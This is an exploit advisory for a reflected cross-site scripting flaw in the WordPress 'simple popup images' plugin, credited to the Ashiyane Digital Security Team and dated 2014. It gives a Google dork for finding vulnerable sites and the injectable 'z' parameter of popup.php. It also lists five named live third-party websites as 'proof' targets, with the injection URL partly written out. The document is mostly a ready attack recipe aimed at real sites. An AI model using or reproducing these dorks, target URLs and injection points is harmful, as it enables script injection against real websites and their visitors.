|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#| |-------------------------------------------------------------------------| | [*] Exploit Title: Wordpress simple popup images Cross site scripting Vulnerability | | [*] Exploit Author: Ashiyane Digital Security Team | | [*] Date : Date: 2014-05-21 | | [*] Vendor Homepage : http://www.wordpress.org | | [*] Google Dork: inurl:wp-content/plugins/simple-popup-images | | [*] Tested on: Windows 7 | | [*] Web browser : mozilla firefox |-------------------------------------------------------------------------| | | [*] Location : [localhost]/wp-content/plugins/simple-popup-images/popup.php?z=[XSS] | |-------------------------------------------------------------------------| | [*] Proof: | | [*] http://www.itstopeka.com/ITSblog/wp-content/plugins/simple-popup-images/popup.php?z="/> | | [*] http://www.easywebcreations.com/wp-content/plugins/simple-popup-images/popup.php?z="/> | | [*] http://www.stealthcopter.com/blog/wp-content/plugins/simple-popup-images/popup.php?z="/> | | [*] http://www.pferdehof-muellerschoen.de/wp-content/plugins/simple-popup-images/popup.php?z="/> | | [*] http://www.wabei-mono.com/embroidery/wp-content/plugins/simple-popup-images/popup.php?z="/> |-------------------------------------------------------------------------| | [*] Discovered By : ACC3SS |-------------------------------------------------------------------------| |-------------------------------------------------------------------------| |#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|